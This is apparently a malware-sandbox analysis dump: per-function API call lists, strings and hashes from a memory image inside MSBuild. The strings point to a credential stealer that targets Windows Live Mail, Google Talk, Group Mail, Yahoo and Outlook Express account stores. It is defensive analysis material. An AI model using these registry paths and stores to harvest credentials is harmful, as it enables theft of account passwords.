Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87

memset.MSVCRT ref: 00444379
memset.MSVCRT ref: 00444394

Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57

ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
strlen.MSVCRT ref: 004443DB
_strcmpi.MSVCRT ref: 00444401

Strings

Store Root, xrefs: 004443A5
\Microsoft\Windows Live Mail, xrefs: 00444350
\Microsoft\Windows Mail, xrefs: 00444329
Software\Microsoft\Windows Live Mail, xrefs: 004443AA

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
API String ID: 832325562-2578778931
Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040F567
memset.MSVCRT ref: 0040F57F

Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA

RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7

Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA

Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754

memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3

Strings

, xrefs: 0040F5FA

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
String ID:
API String ID: 2012582556-3916222277
Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004037EB
memset.MSVCRT ref: 004037FF

Part of subcall function 00444551: memset.MSVCRT ref: 00444573
Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF

Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20

strchr.MSVCRT ref: 0040386E
_mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
strlen.MSVCRT ref: 00403897
sprintf.MSVCRT ref: 004038B7
_mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD

Strings

%s@yahoo.com, xrefs: 004038B1

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
String ID: %s@yahoo.com
API String ID: 317221925-3288273942
Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00403504
memset.MSVCRT ref: 0040351A

Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57

_mbscpy.MSVCRT(00000000,00000000), ref: 00403555

Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D

_mbscat.MSVCRT ref: 0040356D

Strings

InstallPath, xrefs: 0040352B
fb.dat, xrefs: 00403567
Software\Group Mail, xrefs: 00403530

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _mbscatmemset$Close_mbscpystrlen
String ID: InstallPath$Software\Group Mail$fb.dat
API String ID: 3071782539-966475738
Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040CCFE
??2@YAPAXI@Z.MSVCRT(00001324), ref: 0040CD1C
DeleteObject.GDI32(?), ref: 0040CD5A
memset.MSVCRT ref: 0040CD96
LoadIconA.USER32(00000065), ref: 0040CDA6
_mbscpy.MSVCRT(?,00000000), ref: 0040CDC4

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@$DeleteIconLoadObject_mbscpymemset
String ID:
API String ID: 2054149589-0
Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8

Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF

memset.MSVCRT ref: 00408620

Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85

memset.MSVCRT ref: 00408671
RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
RegCloseKey.ADVAPI32(?), ref: 004086D6

Strings

Software\Google\Google Talk\Accounts, xrefs: 004085F1

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
String ID: Software\Google\Google Talk\Accounts
API String ID: 1366857005-1079885057
Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_mbsicmp.MSVCRT ref: 0040BA49
qsort.MSVCRT ref: 0040BAF2
SetCursor.USER32(/nosort), ref: 0040BB00

Strings

/sort, xrefs: 0040BA44
/nosort, xrefs: 0040BAA6

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Cursor_mbsicmpqsort
String ID: /nosort$/sort
API String ID: 882979914-1578091866
Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9

Function 00410DBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31

memset.MSVCRT ref: 00410E10
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
_mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87

Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 889583718-2036018995
Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,?), ref: 00410C75
SizeofResource.KERNEL32(?,00000000), ref: 00410C86
LoadResource.KERNEL32(?,00000000), ref: 00410C96
LockResource.KERNEL32(00000000), ref: 00410CA1

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8

Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004109F7

Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618

WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
memset.MSVCRT ref: 00410A32
GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: PrivateProfileStringmemset$Writememcpysprintf
String ID:
API String ID: 3143880245-0
Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9

Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?), ref: 0044B345
??3@YAXPAX@Z.MSVCRT(?), ref: 0044B355
??3@YAXPAX@Z.MSVCRT(?), ref: 0044B365
??3@YAXPAX@Z.MSVCRT(?), ref: 0044B375

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C

Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00403F8E,0044C530), ref: 00408D5C
??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408D7A
??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408D98
??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408DA8

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09

Function 00406F30 Relevance: 3.8, APIs: 3, Instructions: 38COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00406F4C
memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
free.MSVCRT ref: 00406F6D

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: freemallocmemcpy
String ID:
API String ID: 3056473165-0
Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8

Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011

CreateFontIndirectA.GDI32(?), ref: 004070A6

Strings

Arial, xrefs: 00407092

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: CreateFontIndirect_mbscpymemset
String ID: Arial
API String ID: 3853255127-493054409
Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99

Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06

_strcmpi.MSVCRT ref: 0040CEC3

Strings

/stext, xrefs: 0040CEBE

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: strlen$_strcmpimemset
String ID: /stext
API String ID: 520177685-3817206916
Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9

Function 0044B435 Relevance: 3.1, APIs: 2, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,00000078,00000004), ref: 0044B43E
VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000078,00000004), ref: 0044B452

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7b0ab345f8b147095ec499268aed239778a4d345bd8648cab821ed5a180e1bce
Instruction ID: ac13c79d7fe72252008cad2d8c7d399cb1c4cdb5f22be9a76d9ffffc69c753be
Opcode Fuzzy Hash: 7b0ab345f8b147095ec499268aed239778a4d345bd8648cab821ed5a180e1bce
Instruction Fuzzy Hash: 86F0A4011896907DFA2199B90C42BB75BCCCB27320B240B4BF690C7283D69DCA1693FA

Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A

LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
GetProcAddress.KERNEL32(00000000,?), ref: 00404754

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID:
API String ID: 145871493-0
Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58

Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92

Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: PrivateProfile$StringWrite_itoamemset
String ID:
API String ID: 4165544737-0
Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94

Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58

Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928

Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18

Function 00410CF3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05

Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04

Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON

Download Yara Rule

APIs

